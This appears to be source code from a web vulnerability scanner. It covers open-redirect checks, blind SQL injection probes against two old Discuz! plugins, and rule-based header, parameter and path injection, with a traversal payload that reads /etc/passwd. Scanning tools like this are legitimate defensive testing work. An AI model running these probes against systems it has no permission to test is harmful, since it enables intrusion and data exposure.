def run_url(http, ob, item):
    """Check a crawled URL for an open-redirect vulnerability.

    Every query parameter whose value looks like a URL is replaced with a
    marker site (http://openresty.org/cn/); the rewritten URL is then
    requested and, if the response body contains the marker page's text,
    the target followed/fetched our injected URL.

    Args:
        http: shared HTTP client (unused; a fresh one is built with the
            task's webTimeout).
        ob:   task/target descriptor (domain, level, webTimeout, source_ip,
            ...).
        item: crawled request descriptor (url, method, refer, ...).

    Returns:
        list of vulnerability records (possibly empty).
    """
    header = {
        "Host": ob['domain'],
        "Connection": "keep-alive",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "Referer": item['refer'],
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        # "Cookie": ob.get('cookie')
    }
    # BUGFIX: result must exist before the try block; it used to be created
    # inside, so an early exception made `return result` raise NameError.
    result = []
    try:
        path = item['url']
        method = item['method']
        timeout = ob.get('webTimeout')
        http = Http(timeout=timeout)
        url_parse = urlparse(path)
        netloc = url_parse.netloc
        source_ip = ob.get('source_ip')
        if source_ip:
            # Hit the origin IP directly while keeping the Host header.
            netloc = source_ip
        query_dict = post_query2dict(path)
        for key in query_dict.keys():
            url2 = getDomain(query_dict[key])
            if url2:
                # The parameter value is itself a URL -> swap in the marker.
                query_dict[key] = 'http://openresty.org/cn/'
        new_query = dict2query(query_dict)
        new_url = "%s://%s%s?%s" % (url_parse.scheme, netloc, url_parse.path,
                                    new_query)
        res, content = http.request(new_url, 'GET', headers=header)
        # Marker text from the openresty.org landing page.
        c = re.search('''OpenResty 是一个基于 NGINX 和 LuaJIT 的 Web 平台。''', content)
        if c:
            response = getResponse(res, content,
                                   'OpenResty 是一个基于 NGINX 和 LuaJIT 的 Web 平台。')
            request = getRequest(path, 'POST', headers=header,
                                 domain=ob['domain'])
            detail = "存在任意网址跳转漏洞"
            result.append(
                getRecord(ob, path, ob['level'], detail, request, response))
        return result
    except Exception as e:
        logger.error("File:PageredirectsScript_yd.py, run_url function :%s"
                     % (str(e)))
    return result
def returnInjectResult(
        self,
        url='',
        confirm=0,
        detail='',
        response=None,
        output='',
        payload=''):
    """Format a detected injection result for output.

    Args:
        url:     the requested URL.
        confirm: whether the vulnerability is confirmed, 0 or 1.
        detail:  vulnerability description.
        response: HTTP exchange info, a dict with keys:
            httpcode          HTTP status code
            url               requested URL
            method            request method
            request_headers   request headers (dict)
            request_body      request body
            response_headers  response headers (dict)
            response_body     response body
        output:  extra page output; used by some plugins to store data.
        payload: the crafted attack payload.

    Returns:
        dict with keys: url, confirm, detail, httpcode, request (formatted
        request entity), response (formatted response entity), output,
        payload.
    """
    if response is None:
        # Was a mutable default argument; build a fresh blank exchange per
        # call instead (behavior is identical since it is only read).
        response = {
            'httpcode': 0,
            'url': '',
            'method': '',
            'request_headers': {},
            'request_body': '',
            'response_headers': {},
            'response_body': ''
        }
    formatResult = {}
    # BUGFIX: 'url' was mistakenly assigned `confirm` (copy-paste error
    # from the next line).
    formatResult['url'] = url
    formatResult['confirm'] = confirm
    formatResult['detail'] = detail
    formatResult['httpcode'] = response['httpcode']
    formatResult['request'] = getRequest(response['url'],
                                         response['method'].upper(),
                                         response['request_headers'],
                                         response['request_body'])
    formatResult['response'] = getResponse(response['response_headers'],
                                           response['response_body'])
    formatResult['output'] = output
    formatResult['payload'] = payload
    return formatResult
def run_domain(http, ob):
    """Not enabled yet - draft.

    CVE-2009-4621 / CNNVD-201001-184
    SQL injection in 'forummission.php' of the Patching JangHu Inn plugin
    (JiangHu Inn plugin 1.1 and earlier for Discuz!): a remote attacker can
    execute arbitrary SQL via the `id` parameter of the show action.
    CVSS 7.5 [HIGH]; CWE-89 (improper neutralization of special elements
    used in an SQL command).

    Detection: send a boolean-true and a boolean-false payload and flag the
    target when the two responses differ (blind boolean-based check).

    Args:
        http: HTTP client exposing request(url, method, headers).
        ob:   task/target descriptor (scheme, domain, path, level,
            source_ip, ...).

    Returns:
        list of vulnerability records (BUGFIX: the original fell off the
        end and implicitly returned None).
    """
    scheme = ob['scheme']
    domain = ob['domain']
    path = ob.get('path', '/')
    header = {'Host': domain}
    source_ip = ob.get('source_ip')
    if source_ip:
        # Hit the origin IP directly while keeping the Host header.
        domain = source_ip
    result = []
    try:
        # Normalize path to always end with '/' (guard against '' too).
        if not path:
            path = '/'
        if '/' != path[-1]:
            path += '/'
        true_load, false_load = num_type()
        query_t = 'index=show&id=24%s' % true_load
        query_f = 'index=show&id=24%s' % false_load
        url_t = '%s://%s%s%s?%s' % (scheme, domain, path,
                                    'forummission.php', query_t)
        url_f = '%s://%s%s%s?%s' % (scheme, domain, path,
                                    'forummission.php', query_f)
        res_t, content_t = http.request(url=url_t, method='GET',
                                        headers=header)
        res_f, content_f = http.request(url=url_f, method='GET',
                                        headers=header)
        status_t = res_t.get('status', '0')
        status_f = res_f.get('status', '0')
        similar = check_page_similar(status1=status_t, content1=content_t,
                                     status2=status_f, content2=content_f)
        if not similar:
            # Different pages for true/false payloads -> likely injectable.
            detail = "检测到Patching JangHuInn插件'forummission.php' SQL注入漏洞"
            request = getRequest(url_f, domain=ob['domain'])
            response = getResponse(res_f, content_f)
            result.append(
                getRecord(ob, url_f, ob['level'], detail, request, response))
    except Exception as e:
        logger.error(
            "File:Discuz_JiangHu_Inn_1_forummission_php_sql_inject.py, run_domain function:%s"
            % (str(e)))
    return result
def run_domain(http, ob):
    """Not enabled yet - draft.

    CVE-2009-3185 / CNNVD-200909-287
    SQL injection in plugin.php of Discuz! Crazy Star plugin 2.0: a remote
    authenticated user can execute arbitrary SQL via the `fmid` parameter
    of a view action.
    CVSS 7.5 [HIGH]; CWE-89 (improper neutralization of special elements
    used in an SQL command).

    Detection: send a boolean-true and a boolean-false payload and flag the
    target when the two responses differ (blind boolean-based check).

    Args:
        http: HTTP client exposing request(url, method, headers).
        ob:   task/target descriptor (scheme, domain, path, level,
            source_ip, ...).

    Returns:
        list of vulnerability records (BUGFIX: the original fell off the
        end and implicitly returned None).
    """
    scheme = ob['scheme']
    domain = ob['domain']
    path = ob.get('path', '/')
    header = {'Host': domain}
    source_ip = ob.get('source_ip')
    if source_ip:
        # Hit the origin IP directly while keeping the Host header.
        domain = source_ip
    result = []
    try:
        # Normalize path to always end with '/' (guard against '' too).
        if not path:
            path = '/'
        if '/' != path[-1]:
            path += '/'
        true_load, false_load = num_type()
        query_t = 'identifier=family&module=family&action=view&fmid%s' % true_load
        query_f = 'identifier=family&module=family&action=view&fmid%s' % false_load
        url_t = '%s://%s%s%s?%s' % (scheme, domain, path, 'plugin.php',
                                    query_t)
        url_f = '%s://%s%s%s?%s' % (scheme, domain, path, 'plugin.php',
                                    query_f)
        res_t, content_t = http.request(url=url_t, method='GET',
                                        headers=header)
        res_f, content_f = http.request(url=url_f, method='GET',
                                        headers=header)
        status_t = res_t.get('status', '0')
        status_f = res_f.get('status', '0')
        similar = check_page_similar(status1=status_t, content1=content_t,
                                     status2=status_f, content2=content_f)
        if not similar:
            # Different pages for true/false payloads -> likely injectable.
            detail = "检测到Discuz! Crazy Star plugin 2.0版本的plugin.php中存在SQL注入漏洞"
            request = getRequest(url_f, domain=ob['domain'])
            response = getResponse(res_f, content_f)
            result.append(
                getRecord(ob, url_f, ob['level'], detail, request, response))
    except Exception as e:
        logger.error(
            "File:Discuz_Crazy_Star_2_plugin_php_sql_inject.py, run_domain function:%s"
            % (str(e)))
    return result
def run_url(http, ob, item):
    """Rule-driven injection scan for a single crawled URL.

    For every rule loaded for the task, injects payloads into the request
    headers or into the parameters (URL query string or request body),
    replays the request, filters out 404-lookalike and WAF block pages,
    and records a vulnerability when the rule's judge conditions match.

    Args:
        http: shared HTTP client; replaced per rule with a non-redirecting
            client when the judge only needs the status line.
        ob:   task/target descriptor (taskId, domain, level, source_ip,
            404_page, waf_page, ...).
        item: crawled request descriptor (url, params, method, refer).

    Returns:
        list of vulnerability records (BUGFIX: the original never returned
        result_list).
    """
    result_list = []
    url = item['url']
    params = item['params']
    method = item['method']
    task_id = ob['taskId']
    # Load the task's rule list from the database (all rules except the
    # path-injection ones).
    rules = get_rules(task_id)
    # rule example:
    '''
    {
        'area':'params',  # inj_types: headers, path, params(body/query)
        'inj_point':'(path|page|download)',
        'inj_value':['../../../../../etc/passwd'],
        'inj_way':'replace',
        'judge':{'http_code':'200','keyword':'(root|bin|nobody):'}
    }
    '''
    header = {
        "Host": ob['domain'],
        "Connection": "keep-alive",
        "Pragma": "no-cache",
        "Cache-Control": "no-cache",
        "Referer": item['refer'],
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        # "Cookie": ob.get('cookie')
    }
    if len(rules) == 0:
        pass
    else:
        url_parse = urlparse(url)
        scheme = url_parse.scheme
        domain = url_parse.netloc
        path = url_parse.path
        query = url_parse.query
        source_ip = ob.get('source_ip')
        if source_ip:
            # Hit the origin IP directly while keeping the Host header.
            domain = source_ip
        if query:
            url = "%s://%s%s?%s" % (scheme, domain, path, query)
        else:
            url = "%s://%s%s" % (scheme, domain, path)
        for rule in rules:
            res_method = 'HEAD' if rule.get('if_head') else method.upper()
            if rule.get('judge').get('keyword') or rule.get('judge').get(
                    'content') or rule.get('judge').get('similar'):
                # Judge inspects the body: allow a redirect chain.
                redirects = 5
            else:
                # Judge only needs the status line: use HEAD and do not
                # follow redirects.
                http = HttpRequest({'timeout': 10, 'follow_redirects': False})
                redirects = 0
                res_method = 'HEAD'
            # header injection
            if 'header' == rule.get('area'):
                new_header_list = header_inject(header, rule.get('inj_point'),
                                                rule.get('inj_value'),
                                                rule.get('inj_way'))
                for new_header in new_header_list:
                    if 'post' == method:
                        params = post_params2str(params)
                    try:
                        res, content = http.request(url, res_method, params,
                                                    new_header,
                                                    redirections=redirects)
                        # Skip responses that look like the site's 404 page.
                        if page_similar(res.get('status'), content,
                                        ob.get('404_page')):
                            continue
                        # Skip responses that look like a WAF block page.
                        if page_similar(res.get('status'), content,
                                        ob.get('waf_page')):
                            continue
                        # Fetch the un-injected response first when the
                        # rule compares page similarity.
                        if rule.get('judge').get('similar'):
                            normal_res, normal_cont = http.request(
                                url, res_method, params, header)
                        else:
                            normal_res = None
                            normal_cont = None
                        # Decide from the responses whether the rule hit.
                        if result_judge(normal_res, normal_cont, res, content,
                                        **rule.get('judge')):
                            response = getResponse(res, content)
                            request = getRequest(url, res_method,
                                                 headers=new_header,
                                                 body=params,
                                                 domain=ob['domain'])
                            detail = "注入规则:" + json.dumps(rule)
                            ob['vulId'] = rule.get('vul_id')
                            result_list.append(
                                getRecord(ob, url, ob['level'], detail,
                                          request, response))
                    except Exception as e:
                        logger.exception(
                            "File:rule_scan_script_url.py,rule_id:%s , run_domain function :%s"
                            % (rule.get('rule_id'), str(e)))
            # params injection include query&body
            elif 'params' == rule.get('area'):
                try:
                    if url_parse.query:
                        new_query_list = query_inject(url_parse.query,
                                                      rule.get('inj_point'),
                                                      rule.get('inj_value'),
                                                      rule.get('inj_way'))
                        for new_query in new_query_list:
                            new_url = urlunparse(
                                (url_parse.scheme, domain, url_parse.path,
                                 '', new_query, ''))
                            # BUGFIX: new_params was only assigned for POST,
                            # so GET requests with a query string raised
                            # NameError below (silently logged, scan lost).
                            if 'post' == method:
                                new_params = post_params2str(params)
                            else:
                                new_params = None
                            try:
                                res, content = http.request(new_url,
                                                            res_method,
                                                            body=new_params,
                                                            headers=header)
                                # Skip 404-lookalike pages.
                                if page_similar(res.get('status'), content,
                                                ob.get('404_page')):
                                    continue
                                # Skip WAF block pages.
                                if page_similar(res.get('status'), content,
                                                ob.get('waf_page')):
                                    continue
                                # Baseline request for similarity judging.
                                if rule.get('judge').get('similar'):
                                    normal_res, normal_cont = http.request(
                                        url, res_method, params, header)
                                else:
                                    normal_res = None
                                    normal_cont = None
                                # Decide from the responses whether the
                                # rule hit.
                                if result_judge(normal_res, normal_cont,
                                                res, content,
                                                **rule.get('judge')):
                                    response = getResponse(res, content)
                                    request = getRequest(new_url, res_method,
                                                         headers=header,
                                                         body=params,
                                                         domain=ob['domain'])
                                    detail = "注入规则:" + json.dumps(rule)
                                    ob['vulId'] = rule.get('vul_id')
                                    result_list.append(
                                        getRecord(ob, new_url, ob['level'],
                                                  detail, request, response))
                            except Exception as e:
                                logger.exception(
                                    "File:rule_scan_script_url.py,rule_id:%s , run_domain function :%s"
                                    % (rule.get('rule_id'), str(e)))
                    if params:
                        if 'get' == method:
                            # GET: crawled params belong in the query string.
                            new_query_list = query_inject(
                                params, rule.get('inj_point'),
                                rule.get('inj_value'), rule.get('inj_way'))
                            for new_query in new_query_list:
                                new_url = url + "?" + new_query
                                try:
                                    res, content = http.request(
                                        new_url, res_method, body=None,
                                        headers=header)
                                    # Skip 404-lookalike pages.
                                    if page_similar(res.get('status'),
                                                    content,
                                                    ob.get('404_page')):
                                        continue
                                    # Skip WAF block pages.
                                    if page_similar(res.get('status'),
                                                    content,
                                                    ob.get('waf_page')):
                                        continue
                                    # Baseline request for similarity
                                    # judging.
                                    if rule.get('judge').get('similar'):
                                        normal_res, normal_cont = http.request(
                                            url, res_method, body=None,
                                            headers=header)
                                    else:
                                        normal_res = None
                                        normal_cont = None
                                    # Decide whether the rule hit.
                                    if result_judge(normal_res, normal_cont,
                                                    res, content,
                                                    **rule.get('judge')):
                                        response = getResponse(res, content)
                                        request = getRequest(
                                            new_url, res_method,
                                            headers=header, body=params,
                                            domain=ob['domain'])
                                        detail = "注入规则:" + json.dumps(rule)
                                        ob['vulId'] = rule.get('vul_id')
                                        result_list.append(
                                            getRecord(ob, new_url,
                                                      ob['level'], detail,
                                                      request, response))
                                except Exception as e:
                                    logger.exception(
                                        "File:rule_scan_script_domain.py,rule_id:%s , run_domain function :%s"
                                        % (rule.get('rule_id'), str(e)))
                        else:
                            # Non-GET: params are a JSON request body.
                            body_dict = json.loads(params)
                            new_body_list = body_inject(
                                body_dict, rule.get('inj_point'),
                                rule.get('inj_value'), rule.get('inj_way'))
                            if new_body_list:
                                for body in new_body_list:
                                    try:
                                        res, content = http.request(
                                            url, res_method, body=body,
                                            headers=header,
                                            redirections=redirects)
                                        # Skip 404-lookalike pages.
                                        if page_similar(res.get('status'),
                                                        content,
                                                        ob.get('404_page')):
                                            continue
                                        # Skip WAF block pages.
                                        if page_similar(res.get('status'),
                                                        content,
                                                        ob.get('waf_page')):
                                            continue
                                        # Baseline request for similarity
                                        # judging.
                                        if rule.get('judge').get('similar'):
                                            if 'post' == method:
                                                new_params = post_params2str(
                                                    params)
                                            normal_res, normal_cont = http.request(
                                                url, res_method, new_params,
                                                header)
                                        else:
                                            normal_res = None
                                            normal_cont = None
                                        # Decide whether the rule hit.
                                        if result_judge(normal_res,
                                                        normal_cont, res,
                                                        content,
                                                        **rule.get('judge')):
                                            response = getResponse(res,
                                                                   content)
                                            request = getRequest(
                                                url, res_method,
                                                headers=header, body=params,
                                                domain=ob['domain'])
                                            detail = ("注入规则:"
                                                      + json.dumps(rule))
                                            ob['vulId'] = rule.get('vul_id')
                                            result_list.append(
                                                getRecord(ob, url,
                                                          ob['level'],
                                                          detail, request,
                                                          response))
                                    except Exception as e:
                                        logger.exception(
                                            "File:rule_scan_script_domain.py,rule_id:%s , run_domain function :%s"
                                            % (rule.get('rule_id'), str(e)))
                except Exception as e:
                    # NOTE(review): the matching except for this outer try
                    # was missing/unreadable in the original paste; added so
                    # the block is well-formed — confirm against the repo.
                    logger.exception(
                        "File:rule_scan_script_url.py,rule_id:%s , run_domain function :%s"
                        % (rule.get('rule_id'), str(e)))
    return result_list
def run_domain(http, ob):
    """Rule-driven path-injection scan for a whole domain.

    For every rule loaded for the task, rewrites the target path with the
    rule's payloads, requests each rewritten URL, filters out
    404-lookalike and WAF block pages, and records a vulnerability when
    the rule's judge conditions match. The per-request timeout shrinks as
    failures accumulate, and the scan aborts after too many failures.

    Args:
        http: shared HTTP client; replaced per rule with one configured
            for the rule's redirect policy and the adaptive timeout.
        ob:   task/target descriptor (scheme, domain, path, taskId, level,
            source_ip, 404_page, waf_page, ...).

    Returns:
        list of vulnerability records (BUGFIX: the original built
        result_list but never returned it).
    """
    import time  # hoisted: was re-imported inside the request loop

    scheme = ob['scheme']
    domain = ob['domain']
    header = {'Host': domain}
    source_ip = ob.get('source_ip')
    if source_ip:
        # Hit the origin IP directly while keeping the Host header.
        domain = source_ip
    path = ob['path']
    result_list = []
    task_id = ob['taskId']
    # Load the task's rule list from the database (all rules except the
    # path-injection ones).
    rules = get_rules(task_id)
    # rule example:
    '''
    {
        'area':'query',                           # injection area
        'inj_point':'(path|page|download)',       # injection point
        'inj_value':'../../../../../etc/passwd',  # injection value
        'inj_way':'replace',                      # injection method
        'judge':{'http_code':'200','keyword':'(root|bin|nobody):'}
    }
    '''
    if rules:
        timeout_count = 0
        for rule in rules:
            # Abort the whole scan once too many requests have failed.
            if timeout_count > 80:
                break
            # Shrink the per-request timeout as failures pile up; '//'
            # keeps the original Python-2 integer-division semantics.
            n = timeout_count // 10 + 1
            timeout = 10 // n
            method = 'HEAD' if rule.get('if_head') else 'GET'
            if rule.get('judge').get('keyword') or rule.get('judge').get(
                    'content') or rule.get('judge').get('similar'):
                # Judge inspects the body: follow redirects.
                redirects = 5
                http = HttpRequest({
                    'timeout': timeout,
                    'follow_redirects': True
                })
            else:
                # Judge only needs the status line: HEAD, no redirects.
                http = HttpRequest({
                    'timeout': timeout,
                    'follow_redirects': False
                })
                redirects = 0
                method = 'HEAD'
            # start path injection
            try:
                new_path_list = path_inject(path, rule.get('inj_value'),
                                            rule.get('inj_way'))
                for new_path in new_path_list:
                    url = "%s://%s%s" % (scheme, domain, path)
                    new_url = "%s://%s%s" % (scheme, domain, new_path)
                    try:
                        t1 = time.time()
                        res, content = http.request(new_url, method,
                                                    redirections=redirects,
                                                    headers=header)
                        # Skip responses that look like the 404 page.
                        if page_similar(res.get('status'), content,
                                        ob.get('404_page')):
                            continue
                        # Skip responses that look like a WAF block page.
                        if page_similar(res.get('status'), content,
                                        ob.get('waf_page')):
                            continue
                        # Baseline request when the rule compares pages.
                        if rule.get('judge').get('similar'):
                            normal_res, normal_cont = http.request(
                                url, method, headers=header)
                        else:
                            normal_res = None
                            normal_cont = None
                        # Decide from the responses whether the rule hit.
                        judge = rule.get('judge')
                        if result_judge(normal_res, normal_cont, res,
                                        content, **judge):
                            response = getResponse(res, content)
                            request = getRequest(new_url,
                                                 domain=ob['domain'])
                            detail = "注入规则:" + json.dumps(rule)
                            ob['vulId'] = rule.get('vul_id')
                            result_list.append(
                                getRecord(ob, new_url, ob['level'], detail,
                                          request, response, ""))
                    except Exception as e:
                        logger.exception(
                            "File:rule_scan_script_domain.py,rule_id:%s , run_domain function :%s"
                            % (rule.get('rule_id'), str(e)))
                        # Count the failure (debug print of elapsed time
                        # t1..now removed).
                        timeout_count += 1
            except Exception as e:
                logger.exception(
                    "File:rule_scan_script_domain.py,rule_id:%s , run_domain function :%s"
                    % (rule.get('rule_id'), str(e)))
    return result_list